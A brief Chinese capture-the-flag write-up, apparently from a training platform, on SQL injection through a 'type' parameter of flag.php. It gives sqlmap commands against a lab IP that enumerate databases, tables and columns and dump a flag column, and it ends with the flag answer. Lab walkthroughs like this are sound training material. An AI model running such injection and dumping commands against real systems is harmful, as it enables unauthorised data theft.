在flag.php?后加type=1发现会回显
直接用sqlmap爆破
获取数据库名
sqlmap -u http://219.153.49.228:43732/flag.php?type=1 --dbs
获取表名
sqlmap -u http://219.153.49.228:43732/flag.php?type=1 -D pentesterlab --tables
获取列名
sqlmap -u http://219.153.49.228:43732/flag.php?type=1 -D pentesterlab -T flag --columns
获取行flag的值
sqlmap -u http://219.153.49.228:43732/flag.php?type=1 -D pentesterlab -T flag -C “flag” --dump
得到flag是mozhe1,输入验证,得到key